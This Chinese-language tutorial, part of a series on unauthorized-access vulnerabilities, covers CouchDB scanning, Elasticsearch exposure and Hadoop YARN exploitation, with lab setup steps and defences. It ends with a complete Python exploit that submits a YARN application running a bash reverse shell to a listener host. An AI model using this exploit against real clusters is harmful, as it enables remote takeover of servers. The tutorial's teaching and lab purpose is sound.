黑客最喜欢的常见未授权访问漏洞系( 七 ) _漏洞

文章插图

成功执行

文章插图

nmap扫描nmap -p 5984 --script "couchdb-stats.nse" {target_ip}防御手段-绑定指定ip 。-设置访问密码。
Elasticsearch 未授权访问漏洞漏洞简介以及危害 ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java开发的，并作为Apache许可条款下的开放源码发布，是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费，所以免费开源的Elasticsearch可能存在未授权访问漏洞。该漏洞导致，攻击者可以拥有Elasticsearch的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索。 Elasticsearch服务普遍存在一个未授权访问的问题，攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。
漏洞利用环境介绍目标靶机：Centosip地址：192.168.18.138连接工具：Xshell环境搭建

# elasticsearch需要JDK1.8+# 创建elasticsearch用户，elasticsearch不能root执行useradd elasticsearchpasswd elasticsearchsu elasticsearch#下载环境wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip

文章插图

# 解压并启动unzip elasticsearch-5.5.0.zip cd elasticsearch-5.5.0/bin./elasticsearch

文章插图

成功安装

文章插图

未授权访问测试curl http://localhost:9200/_nodes #查看节点数据更多利用可以自行搜索一下

文章插图

防御手段-访问控制策略，限制IP访问，绑定固定IP 。-在config/elasticsearch.yml中为9200端口设置认证等。
Hadoop 未授权访问漏洞漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。
漏洞利用环境介绍目标靶机：Kaliip地址：192.168.18.129连接工具：Xshell环境搭建

mkdir hadoopcd hadoop/wget https://raw.githubusercontent.com/vulhub/vulhub/master/hadoop/unauthorized-yarn/docker-compose.ymlwget https://raw.githubusercontent.com/vulhub/vulhub/master/hadoop/unauthorized-yarn/exploit.py#或者利用DownGit下载https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarnDownGit网址：https://minhaskamal.github.io/DownGit/#/home

文章插图

docker-compose build && docker-compose up -d #编译并启动环境

文章插图

未授权访问测试访问 http://192.168.18.129:8088/cluster

文章插图

通过REST API命令执行利用过程：在本地监听端口 >> 创建Application >> 调用Submit Application API提交
本地监听9999端口

文章插图

EXP:

#!/usr/bin/env pythonimport requeststarget = 'http://192.168.18.129:8088/'lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']url = target + 'ws/v1/cluster/apps'data = https://www.isolves.com/it/aq/fwq/2020-07-29/{'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN',}requests.post(url, json=data)